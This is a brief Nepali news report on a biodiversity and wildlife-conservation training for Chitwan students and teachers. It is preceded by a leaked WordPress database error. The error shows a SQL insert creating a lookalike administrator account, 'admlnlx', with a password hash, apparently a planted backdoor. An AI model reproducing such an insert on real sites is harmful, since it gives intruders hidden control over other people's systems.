WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BdTJ3oWHsXzXDnaZ3w/6DzePVPca7h/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 14:58:52', '', 'admlnlx', 'admlnlx')
चितवन,माघ २१-
पूर्वी चितवनका विद्यार्थी तथा शिक्षकहरुलाई जैविक विविधता तथा वन्यजन्तु संरक्षणका बारेमा प्रशिक्षण दिईएको छ । रत्ननगर १८ बछौलीमा रहेको मृगकुञ्ज मध्यवर्ती बचत तथा ऋण सहकारी संस्थाले आयोजना गरेको सो कार्यक्रममा चित्रसारी मावि,बछौली मावि,मालपुर माविका ५६ जना विद्यार्थी तथा शिक्षकहरुको सहभागिता रहेको सहकारीकी सचिव बिन्दा कार्कीले जानकारी दिईन ।
कार्यक्रममा संरक्षणकर्मीहरु डोमा पौडेल,बासु विडारी र टीका गिरीले प्रकोप न्यूनीकरण र संरक्षणमा विद्यार्थी तथा शिक्षकहरुको भूमिकामा बारेमा सहजीकरण गरेका थिए । संस्थाका अध्यक्ष कृष्ण प्रसाद खतिवडाको अध्यक्षतामा भएको सो कार्यक्रममा सचिव बिन्दा कार्कीले कार्यक्रमको उदेश्यको बारेमा प्रकाश पारेकी थिईन ।